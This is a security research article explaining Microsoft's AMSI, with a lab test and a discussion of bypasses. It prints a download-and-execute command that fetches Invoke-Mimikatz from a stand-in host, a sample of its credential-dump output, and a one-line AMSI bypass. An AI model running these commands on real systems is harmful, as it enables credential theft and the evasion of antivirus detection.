

Microsoft Antimalware Scan Interface – an introduction to AMSI

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Abstract: AMSI stands for Antimalware Scan Interface. AMSI was introduced with Windows 10 and is implemented in Windows Defender. AMSI is an open interface that can be used by antivirus software makers. AMSI can be used to analyze dynamic scripting languages. Among other things, AMSI enables detection of known PowerShell malware.

Keywords: API, Block, Detect, Exploit, Hacker, HTTP, Logging, Malware, Master, Microsoft

1. Preface

This paper was written in 2018 as part of a research project at scip AG, Switzerland. It was initially published online at <https://www.scip.ch/en/?labs.20180111> and is available in English and German. Providing our clients with innovative research for the information technology of the future is an essential part of our company culture.

2. Introduction

Script-based languages such as PowerShell, VBScript or JScript in Microsoft Windows are usually easy prey for hackers. These scripting languages are integrated into the operating system, have a powerful range of functions and are also used to perform legitimate tasks. As a result, PowerShell has become a popular *tool for hackers* [1], because it is very effective and was long considered *hard to detect* [2]. Some antivirus solutions are now able to identify known PowerShell malware, although only scripts that are written to the hard disk are detected. Scripts that are executed directly from the memory are beyond the control of antivirus solutions. Microsoft's introduction of the *Antimalware Scan Interface* (AMSI) is designed to change this.

3. What is AMSI?

Microsoft describes the *Antimalware Scan Interface* [3] (AMSI) as a generic standard interface that allows application and services to interact with the antivirus solutions installed on the system. AMSI provides applications with the common techniques of an antivirus solution, such as scanning the hard drive and memory and analyzing content based on URL and IP address reputation checks. AMSI can also scan scripts that use tactics to conceal malicious code or layers of dynamic code. In the article *Windows 10 to offer application developers new malware defenses* [4], Microsoft software engineer *Lee Holmes* [5] explains how the function then uses the *AMSI API* to scan the code when it is passed in plaintext form to the scripting engine. If, for example, a script uses *Base64 encoding* as a concealment tactic, AMSI performs the scan

for potentially malicious code again after decoding the Base64 payload.

Microsoft's native antivirus solution in Windows 10, *Windows Defender*, supports AMSI. Version 5 of PowerShell also includes *support for AMSI* [6]. In Windows 10, the respective antivirus solution uses AMSI to scan the content of PowerShell script – provided the solution already uses AMSI.

4. AMSI in Action

We tested AMSI in our lab environment on Windows Server 2016. As a control experiment, Windows Defender was disabled and the PowerShell script *Invoke-Mimikatz.ps1* [7] was loaded from a web page and executed using *Invoke-Expression*:

```
PS C:\> Invoke-Expression ((New-Object
Net.Webclient).DownloadString("https://malwar
e.example.org/Invoke-Mimikatz.ps1")); Invoke-
Mimikatz -Dumpcreds

.#####.  mimikatz 2.1.1 (x64) built on Jul
20 2017 01:35:38
.## ^ ##.  "A La Vie, A L'Amour"
## / \ ##  /* * *
## \ / ##  Benjamin DELPY `gentilkiwi` (
benjamin@gentilkiwi.com )
'## v ##'
http://blog.gentilkiwi.com/mimikatz
(oe.eo)
'#####'
with 21 modules * * */

mimikatz(powershell) #
sekurlsa::logonpasswords

Authentication Id : 0 ; 3360624
(00000000:00334770)
Session           : RemoteInteractive from 2
User Name         : adm_mreynolds
Domain           : LABS
Logon Server      : DC01
Logon Time        : 27.12.2017 08:07:24
SID              : S-1-5-21-3685327493-
4069616680-3530608807-1105
msv :
[00000003] Primary
* Username : adm_mreynolds
```

```

* Domain : LABS
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 :
da39a3ee5e6b4b0d3255bfef95601890afd80709
* DPAPI :
6667bd7c8c3dfe7a50b973a1acdec2d
tspkg :
wdigest :
* Username : adm_mreynolds
* Domain : LABS
* Password : (null)
kerberos :
* Username : adm_mreynolds
* Domain : LABS.SCIP.CH
* Password : (null)
ssp :
credman :

```

As expected, *Invoke-Mimikatz* was executed without any trouble. Then Windows Defender was enabled and the test performed again. This time the execution failed and *invoke Mimikatz* was blocked by Windows Defender. The relevant event log entry indicates that AMSI is the source of the discovery:

```

Windows Defender has detected malware or
other potentially unwanted software.
For more information please see the
following:
http://go.microsoft.com/fwlink/?
linkid=37020&name=HackTool:Win32/Mikatz!dha&t
hreatid=2147706304&enterprise=0
Name: HackTool:Win32/Mikatz!dha
ID: 2147706304
Severity: High
Category: Tool
Path:
amsi:_PowerShell_C:\Windows\System32\WindowsP
owerShell\v1.0\powershell.exe_10.0.14393.0000
0000000000004
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: AMSI
User: LABS\adm_hwashburne
Process Name: Unknown
Signature Version: AV: 1.259.809.0, AS:
1.259.809.0, NIS: 118.2.0.0
Engine Version: AM: 1.1.14405.2, NIS:
2.1.14202.0

```

Before the introduction of AMSI, Windows Defender could detect *Invoke-Mimikatz.ps1* only if the file was written to the disk. However, it was possible to subvert Windows Defender when executing it from the memory.

5. Getting around AMSI

As with any other security measure, there are also ways to get around AMSI. If, for example, PowerShell version 2 is executed on the respective system, the *AMSI integration* will be missing from PowerShell and the executable code is not scanned. Since AMSI also uses a signature-based approach, a significant change can potentially prevent discovery of detected malware scripts.

Another method is to disable AMSI with the PowerShell cmdlet *Set-MpPreference*; for example, as *Nikhil Mittal* [8] explains in his presentation *AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It* [9]. This disables Windows Defender's real-time detection, an operation that requires administrator rights.

The `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic, Static').SetValue($null, $true)` disables AMSI for the current process. The *AMSI bypass* [10] was discovered by *Matt Graeber* [11] and does not require any administrative rights. In both cases, the executed operation or the deactivation is detected by monitoring the PowerShell and event logs.

6. Conclusion

Microsoft's introduction of the *Antimalware Scan Interface* closes a gap that until now has been exploited by use of script-based languages. The combination of *script block logging* [12], *Constrained Language Mode* [13] and AMSI allows PowerShell to be monitored and controlled in such a way that it is no longer lucrative for hackers. Microsoft has also included AMSI support in Office, so that *macros can be scanned for known malware* [14]. AMSI provides a good way for application developers and makers of antivirus solutions to proactively prevent the spread of script-based malicious code in Windows.

7. External Links

- [1] <https://www.scip.ch/en/?labs.20150806>
- [2] <https://www.scip.ch/en/?labs.20160407>
- [3] <https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587%28v%3Dvs.85%29.aspx>
- [4] <https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>
- [5] https://twitter.com/Lee_Holmes
- [6] <https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>
- [7] <https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>
- [8] https://twitter.com/nikhil_mitt
- [9] <https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf>
- [10] <https://twitter.com/mattifestation/status/735261176745988096>
- [11] <https://twitter.com/mattifestation>
- [12] <https://www.scip.ch/en/?labs.20160407>
- [13] <https://www.scip.ch/en/?labs.20161020>
- [14] <https://support.office.com/en-us/article/Malicious-macros-were-found-9e461c61-69d1-4ea9-a386-9ad0deaccfd>